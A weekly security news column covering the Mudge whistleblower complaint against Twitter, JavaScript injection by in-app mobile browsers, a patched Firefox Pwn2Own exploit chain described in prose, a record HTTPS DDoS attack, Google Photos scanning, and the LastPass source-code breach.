Zephyrnet Logo

This Week in Security: In Mudge We Trust, Don’t Trust That App Browser, and Firefox at Pwn2Own

Date:

image

There’s yet another brouhaha forming over Twitter, but this time around it’s a security researcher making noise instead of an eccentric billionaire. [Peiter Zatko] worked as Twitter’s security chief for just over a year, from November 2020 through January 2022. You may know Zatko better as [Mudge], a renowned security researcher, who literally wrote the book on buffer overflows. He was a member at L0pht Heavy Industries, worked at DARPA and Google, and was brought on at Twitter in response to the July 2020 hack that saw many brand accounts running Bitcoin scans.

Mudge was terminated at Twitter January 2022, and it seems he immediately started putting together a whistleblower complaint. You can access his complaint packet on archive.org, with whistleblower_disclosure.pdf (PDF, and mirror) being the primary document. There are some interesting tidbits in here, like the real answer to how many spam bots are on Twitter: “We don’t really know.” The very public claim that “…<5% of reported mDAU for the quarter are spam accounts” is a bit of a handwave, as the monetizable Daily Active Users count is essentially defined as active accounts that are not bots. Perhaps Mr. Musk has a more legitimate complaint than was previously thought.

Over 30% of Twitter’s employee computers had security updates disabled on some level, and about half of Twitter staff had access to production systems. At one point, [Mudge] felt the need to “seal the production environment”, fearing vandalism from an internal engineer in response to political upheaval. To his astonishment, there was nothing in place to prevent, or even track that sort of attack. Another worrying discovery was a lack of a disaster plan around a multi-node failure. The details are redacted, but some number of data centers going down gracefully at the same time would cripple Twitter’s infrastructure for weeks or longer, with the note that bootstrapping back to service would be a challenge of unknown difficulty. Interestingly, this exact scenario almost took Twitter down permanently in Spring 2021. I’ll note here that this also implies that Twitter could feasibly suffer from a split-brain scenario if network connectivity between its data centers were interrupted. This is an effect in high-availability systems where multiple systems are running in master mode, and the shared data-set converges.

There was some odd pushback, like the request that [Mudge] give his initial overview of problems orally, and that he not send the written report to board members. It’s never a good sign when you get a request not to put something in writing. Later, [Mudge] brought an outside firm in to prepare reports on how well Twitter was doing combating the spam and bot problem. Twitter’s executives hired a law firm, routing the reports to the firm first, where they were scrubbed of the most embarrassing details, and only then delivered to [Mudge]. Astounding.

An internal-facing system for Twitter engineers was seeing nearly 3,000 daily failed logins. No one knew why, and it was never addressed. Employee workstations did not have functioning backups, and the response from executives was that at least this gave them a reasonable excuse to not comply with official requests for records. As of earlier this year, Twitter had an estimated 10,000 services that may have Log4j vulnerabilities, and no workable plan to address the possible vulnerabilities. If you wanted a bug bounty from Twitter, this seems like a great place to start.

Things didn’t get better. [Mudge] tried to blow the whistle internally, on what he considered to be a fraudulent report presented December 16th to Twitter’s board. This effort percolated through Twitter’s internal structure for a month, and on January 18th he stated that he had an accurate report (PDF, and PDF mirror) nearly ready to present to the board. In an apparent desperate attempt to prevent this report from being delivered, [Mudge] was fired the next day, January 19th.

My initial response is well summed up by Martin McKeay, ironically on Twitter.

And when you’re looking for a well-reasoned dissent, Robert Graham is usually a good source. He doesn’t disappoint on this topic, making the case that while many of [Mudge]’s concerns are valid, the overall package is overblown. He points to several sections in the complaint that are statements of opinion instead of statements of fact, stating, “It makes him look like a Holy Crusader fighting for a cause, rather than a neutral party delivering his professional expertise.”

In-App Browser

iOS and Android apps have picked up a new habit — opening links in the app itself instead of opening them in your primary browser. You may not have thought anything about the in-app browser, but [Felix Krause] sure has. See, when an app runs its own browser, that app is the boss now. Developer wants to inject some CSS or JS on a site, or every site? No problem. And here, HTTPS won’t save you. But surely none of the popular apps would take advantage of this, right?

That brings us to inappbrowser.com. Send that link to yourself, and open it in the app. It searches for odd or known-dangerous JS objects, and lists everything it finds. Keep in mind that not all injected code is malicious, it might just be themeing a page, or adding functionality to already existing content. There are a few apps that seem particularly troublesome, like Instagram, Facebook, and TikTok. TikTok, to no one’s surprise, captures every screen tap and keyboard press while using the inn-app browser. And while most other in-app browsers have a button to open in your primary browser, TikTok leaves that one out, making it even harder to escape their garden. These issues were specifically observed on iOS, but it’s very likely that similar problems exist in Android apps.

Firefox At Pwn2Own

This story comes to us by way of Pwn2Own Vancouver 2022, where [Manfred Paul] demonstrated a novel attack on Mozilla’s Firefox browser. By chaining multiple prototype corruption vulnerabilities, an attack goes all the way from running JavaScript code on a website, to arbitrary code execution on the host computer. It’s a single-click exploit, a really nasty one, but thankfully it was demonstrated at Pwn2Own and fixed in Firefox 100.0.2. Zero Day Initiative has the write-up for us, and part one details the first exploit, jumping from JavaScript execution to arbitrary code execution, but still inside the render sandbox.

The starting point here is to understand that Firefox implements some of its features entirely inside JavaScript, and all the Javascript that runs inside the renderer sandbox is running in the same context. One of those features that is implemented in JavaScript is top level await, a way to load a JavaScript module in the background. If the loaded module overrides the array prototype in a particular way, that override gets called in the feature code. Once called, a handle to the module gets leaked back to the untrusted code. This handle isn’t intended to be exposed, and calls to its functions can be unsafe. This allows breaking out of the JavaScript engine and writing values to arbitrary memory locations — albeit all still inside the browser’s sandbox. Another clever trick is used to actually execute arbitrary code. Floating-point constants are stored inline in WebAssembly methods, and these are executable sections of memory. So snippets of code to run can be encoded as floating-point numbers, and the return pointer overwritten to jump into the code. This isn’t practical for a larger payload, so this technique is used to mark a larger ArrayBuffer object as executable, and then jump to that, which provides arbitrary execution of much larger bits of code.

Part two of the post is all about how to escape the sandbox and get code running on the system. And in this story, it’s JavaScript Prototype Pollution all the way down. Even outside the sandbox, various bits of the Firefox browser are implemented in JS, and there are several interfaces through which sandboxed code talks to the parent process. So the attack code fiddles with the Object prototype, and then needs to get the tab.setAttribute() function to run, where the manipulated prototype will inject an attribute. The easiest way to pull this off is to crash the tab in question, and since we have arbitrary memory access, it’s trivial. The attribute that gets added is how to handle a title text overflow, and the action to take is to set the tab’s sandbox level to 0. Sneaky.

[embedded content]

Google Has Entered the DDoS Fight

Google has quite the feather in their DDoS mitigation cap, having successfully stopped the largest HTTPS DDoS attack on record, handling 46 million requests per second against one of their customers. The idea of this attack is that it’s computationally expensive to perform an HTTPS handshake, and if enough new connections arrive at the same time, the servers backing the service can’t keep up. Keep the pressure on, and the service is totally inaccessible.

The real challenge in trying to stop this particular attack is to discern the malicious traffic from legitimate users. This customer had already been using Google’s Adaptive Protection, so a fingerprint of legitimate traffic had been gathered. The exact details on how malicious traffic was matched hasn’t been published, but one could guess that multiple new connections from the same IP address, and known compromised IPs could be part of that solution. Regardless, it’s an impressive feat.

What Could Go Wrong? This.

And finally, pointed out by user [Hecker] on the Hackaday Discord server, we see the ugly unintended side effect of scanning users’ photos for illegal material. It seems that the mere act of backing up photos to Google Photos triggers such a scan, and this turned into a nightmare scenario for one user. A picture taken for a medical diagnosis led to account termination and a police inquiry, though the detective assigned to the case determined that the whole situation was ridiculous and no crime had occurred. Privacy really does matter, especially for the innocent.

LastPass

And some very last minute news, LastPass has published a notice that they detected unauthorized access to their source code via a compromised developer account. It sounds like they are doing a thorough investigation of the incident. LastPass is designed so that all the secrets are stored on the user’s computer, so it’s unlikely that any user data has been compromised. Yet. The one attack LastPass could be vulnerable to is the introduction of malicious code into the browser plugin and mobile apps, and a compromised dev account is in some sense the worst case, so it’s good that they caught it. I’m quite confident their experts are combing through their development environment and codebase with fine toothed combs at this very moment. More next week if there are updates to be had.

spot_img

Latest Intelligence

spot_img